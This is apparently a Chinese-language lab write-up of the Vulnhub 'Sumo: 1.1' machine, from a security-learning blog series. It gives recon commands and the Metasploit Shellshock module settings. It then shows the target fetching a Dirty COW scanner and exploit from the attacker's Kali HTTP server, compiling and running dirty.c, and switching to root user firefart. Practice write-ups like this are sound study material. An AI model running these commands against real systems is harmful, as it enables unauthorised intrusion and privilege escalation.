往期博文:
[網絡安全學習篇78]:Sumo: 1.1 Vulnhub 實戰(髒牛漏洞提權)(本篇)
下期博文:
[網絡安全學習篇79]:Geisha: 1 Vulnhub 實戰
目錄
網絡掃描
arp-scan -l
nmap -A 192.168.1.174 -p-
nikto 掃描網站漏洞
nikto -h http://192.168.1.174
攻擊
使用msf 查找此漏洞的攻擊模塊
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS 192.168.1.174
set TARGETURI /cgi-bin/test
exploit
髒牛-提權
掃描是否存在髒牛漏洞腳本scan-dirtycow.sh
https://github.com/aishee/scan-dirtycow/blob/master/dirtycowscan.sh
exp:dirty.c
kali 本地開啓http 服務
python -m SimpleHTTPServer
遠程訪問kali 並下載腳本文件,掃描,發現存在髒牛漏洞
chmod 777 scan-dirtycow.sh
./scan-dirtycow.sh
漏洞利用
遠程下載exp,編譯
chmod 777 dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
拿到flag
./dirty testpasswd
su firefart
testpasswd
參考博文: